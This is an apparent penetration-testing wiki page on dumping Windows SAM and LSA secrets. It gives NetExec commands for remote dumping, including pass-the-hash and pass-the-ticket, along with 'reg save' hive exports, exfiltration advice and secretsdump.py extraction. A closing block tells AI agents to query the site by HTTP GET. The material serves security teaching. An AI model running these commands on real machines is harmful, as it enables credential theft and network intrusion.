# SAM & LSA secrets

## Overview

Windows passwords are hashed and stored in the SAM and SECURITY registry hives.&#x20;

A breakdown of the important hives is shown below:

**SAM**

Stores locally cached credentials in LM or NT hash format.

**SECURITY**

Stores domain cached credentials (LSA secrets) in plaintext, LM or NT hash, kerberos keys (DES, AES),  domain cached credentials (DCC1 and DCC2), as well as security questions (L$SQSA).

**SYSTEM**

This registry can be exported to aid decryption of the SAM secrets and LSA secrets.

## Remotely Dumping

The SAM and LSA secrets can be dumped **remotely** by exporting the registry hives and then using a credential extraction tool. NetExec is a tool that will perform various remote network tasks, including dumping of the SAM and LSA secrets.&#x20;

* <https://github.com/Pennyw0rth/NetExec>

NetExec may be used to connect to a remote Windows host using various types of credentials. It should be noted that you are required to have local administrator privileges to do this:

**Remote SAM/LSA secrets dump using domain user with local administrator privileges** &#x20;

`netexec smb <Windows_IP> -d <domain> -u <user> -p <password> <--sam/--lsa>`

**Remote SAM/LSA secrets dump using local user with local administrator privileges** &#x20;

`netexec smb <Windows_IP> --local-auth -u <user> -p <password> <--sam/--lsa>`

**Remote SAM/LSA secrets dump using pass-the-hash attack with local administrator user** &#x20;

`netexec smb <Windows_IP> -d <domain> -u <user> -H <NT_hash> <--sam/--lsa>`

**Remote SAM/LSA secrets dump using pass-the-ticket attack with local administrator user**

`netexec smb <Windows_IP> --kerberos <--sam/--lsa>`

## Local Dumping

### The Dump

The SAM and LSA secrets can be dumped **locally** by exporting the registry hives locally and then using an offline credential extraction tool. The easiest way to export the registry hives is to use a local cmd prompt with the following commands:

`reg save HKLM\SAM "C:\Windows\Temp\sam"`

`reg save HKLM\SECURITY "C:\Windows\Temp\security"`&#x20;

`reg save HKLM\SYSTEM "C:\Windows\Temp\system"`

These files can then be exfiltrated out of the Windows machine and onto your attack machine.

### Credential Extraction

secretsdump.py performs various techniques to dump password hashes and secrets.&#x20;

* <https://github.com/fortra/impacket/blob/master/examples/secretsdump.py>

The command below should be used on your attack machine and be fed the registry files that you exported using the dump technique above:&#x20;

`secretsdump.py -sam '<sam_hive>' -security '<security_hive>' -system '<system_hive>' LOCAL`


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://wiki.pentestlist.com/offensive-security/internal-infrastructure/credential-discovery/sam-and-lsa-secrets.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.